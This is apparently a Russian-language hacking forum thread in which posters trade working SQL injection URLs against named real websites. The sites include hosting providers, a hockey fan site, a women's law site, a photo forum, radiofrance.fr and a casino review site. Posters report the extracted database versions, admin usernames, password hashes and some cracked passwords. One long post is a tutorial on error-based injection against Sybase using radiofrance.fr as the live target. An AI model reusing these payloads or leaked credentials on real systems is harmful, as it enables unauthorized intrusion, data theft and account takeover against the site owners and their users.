Горе-кодеры Code: http://valera.asf.ru/perl/cookbook/cont.php?id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71)/*
Парочка хостеров: Ни у кого там сайтов нет ? Этот смешной, там чудо защита какая-то,по ходу на скобки пишет: "I don't like you...", можно подумать я в восторге _http://fairhost.ru/article.php?sid=-13+union+select+1,2,3,4,5,6,7,8,@@version,0,11/* 4.0.27-max-log ------------------------------------- _http://www.alestar.biz/index.php?id1=5+and+1=2+union+select+1,2,concat(user(),char(58),version(),char(58),database()),4,5,6/* alesta_ya@localhost:4.1.22:alesta_db1 вывод в исходник -------------------------------------- Таблицы не подобрал
http://library.informdon.ru/ Code: http://library.informdon.ru/?p=4&sp=32&tp=2345432+union+select+0,pass,2,3,4,5,6,name+from+admin administrator:2001 Code: http://informdon.ru/library/admin/ OS :Windows NT A10 5.2 build 3790 там загрузка файла тоже есть имхо
Code: http://www.rogerssprayers.com/index.php?option=com_productshowcase&Itemid=1&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
Белорусский сайт любителей хоккея. http://www.belarushockey.com/?commid=-2141'+union+select+1,2,3,concat_ws(char(35),version(),database(),user())/* 4.0.24_Debian-10sarge1-log#belarushockeycom#belarushockeycom@localhost http://www.belarushockey.com/?commid=-2141'+union+select+1,nick,mail,message+from+comment/* http://www.belarushockey.com/?commid=-2141'+union+select+1,author,title,text+from+news+where+id=2142/*
http://www.apevia.com/category.php?cid=-14+union+select+1,concat_ws(0x3A3a,user(),database(),version()),3/* Есть таблица users. Поля не подобрал. aspire@localhost::aspire::4.1.22-log
www.women-law.org wapwebsite@localhost::4.1.22-standard::wapweb http://www.women-law.org/program_service.php?pid=-14+union+select+1,2,concat_ws(0x3A3a,username,password),4,5+from+users/* melitokagan::ed0c2fc45dd1662774ac8e8a86b9167d: m3k605 project::5f212e25801eb5a9fd02a0ee62e2fbb9: tap1982
www.masterphoto.ru 5.0.45-community/master_masterpho@localhost/master_masterphoto http://www.masterphoto.ru/news/news.php?uid=-1+union+select+1,concat(name,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user/* Таблицы: user Поля: name email Поля с паролями не подобрал
http://www.masterphoto.ru/news/news.php?uid=-1+union+select+1,concat(user_password,char(58)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+phpbb_users%20where%20user_id=2/* masterphoto:786c2704f76e06e44aad1e0213d26018:gbcbrhenj http://www.masterphoto.ru/forum/admin/ там еше и форум есть а я спать
Крупный хостиг в зоне кз http://user.kz/files/cifry.php?sid=-9965481+union+select+1,2,3,4,5,6,7/* http://handbook.ecu.edu.au/CourseStructure.asp?disyear=2008+and+1=1--&CID=1&USID=0&UCID=0&UID=0&Ver=0&HB=HB&SC=
ReVOLVeR Хорош прикалываться 1.баян 2.вобще люкс: твой пост _http://forum.antichat.ru/showpost.php?p=621958&postcount=5162
Хм, чето только мускул один, есть же и другие: Postgre, Mssql, Sybase и т.д. осбенно мало на форумах постят про Sybase... вобщем Sybase использует Transact-SQL, как например MS Access и MSSQL но они отличаются немного, вот пример: Получаем данные через вывод сообщения об ошибке приведения типов. версия: Code: http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(@@version))-- текущий пользователь: Code: http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(user_name()))-- имена бд: Code: http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(dbname)+from+master..syslogins))-- следующее имя бд: Code: http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(dbname)+from+master..syslogins+where+dbname+not+in+(0x73796273797374656D6462)))-- здесь 0x73796273797374656D6462=hex('sybsystemdb') следующее имя: Code: http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(dbname)+from+master..syslogins+where+dbname+not+in+(0x726670726F64,0x73796273797374656D6462)))-- 0x726670726F64=hex('rfprod') и т.д. узнаем таблицы в бд rfprod (в других по аналогии): Code: http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||convert(char,id))+from+rfprod..sysobjects+where+type=0x55))-- тут надо пояснить, || -знак конкатенации (объединения) в sybase, convert(char,id) нужен для того, что бы привести числовое поле id (очень нужное) к символьному типу, иначе возникнет ошибка несоответствия типов, from+rfprod..sysobjects означает то, что мы выбираем значения из системной таблицы sysobjects базы данных rfprod, в этой таблице хранятся записи об объектах этой бд, но нам нужны не все объекты, а только пользовательские таблицы, они имеют тип U, hex('U')=0x55 (where+type=0x55) надеюсь с этим все понятно узнаем имя следующей таблицы: Code: http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||convert(char,id))+from+rfprod..sysobjects+where+type=0x55+and+id+not+in+(1785877529)))-- поясню, т.к. id уникально, для перебора удобнее использовать именно его узнаем поля таблицы wifi_reactions (id=1785877529) (другие таблицы по аналогии): Code: http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||convert(char,colid))+from+rfprod..syscolumns+where+id=1785877529))-- Тут тоже нужно пояснить: colid - это идентификационный номер поля, он не несет смысловой нагрузги, но его удобно использовать при переборе, from+rfprod..syscolumns означает то, что мы выбираем значения из системной таблицы syscolumns базы данных rfprod, в этой таблице хранятся записи об колонках этой бд! (а не только одной таблицы), where+id=1785877529 - указывает колонки какой таблицы выбирать, я ранее говорил, что id таблицы очень важное для нас значение, так вот определение того, к какой таблице принадлежит имя поля, происходит именно по id таблицы и только по id узнаем имя следующего поля: Code: http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||convert(char,colid))+from+rfprod..syscolumns+where+id=1785877529+and+colid+not+in+(4)))-- и т.д получаем данные из таблицы wifi_reactions: Code: http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(convert(varchar,reactions)||0x3a||ville)+from+rfprod..wifi_reactions))-- что это такое, фиг его знает, но нам важны не данные, а принцип получения данных, convert(varchar,reactions) - нужен для того, что бы привести данные из поля reactions, которое имеет тип VARBINARY, к типу varchar для совместимости, если этого не сделать, появится ошибка несовместимости типов Ну вроде пока все, так вот из обычного поста получилась небольшая статейка для новичков, об SQL-inj в SYBASE Adaptive Server Enterprise ЗЫ в ASE жесткое разграничение прав пользователей, для пользователя может быть ограничен доступ не только к БД и таблице БД, но также и к отдельному полю таблицы
http://www.videoland.nl/index_film_record.php?id=4370455454+union+select+0,1,2+from+a таблицы http://www.seatsandsofas.nl/info.php?id=7&lang_id=1&country_id=1444'union+select+0,1,2,3,4+from+users/* +таблицa: admin
Сервс провайдер на рынке SMS + моя первая скуля. user: [email protected] Log: Debian_7etch4-log version: 5.0.32
Code: http://www.casinogenie.co.uk/casino_review.php?casinoid=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* root@localhost casinogenie 5.0.24a-Debian_1-log Code: http://www.sg-bevenrode.de/portal/news2.php?nid=99999+union+select+1,2,3,4,5/*
http://www.sg-bevenrode.de/portal/news2.php?nid=99999+union+select+1,email,name,password,5+from+user [email protected] : admin :root
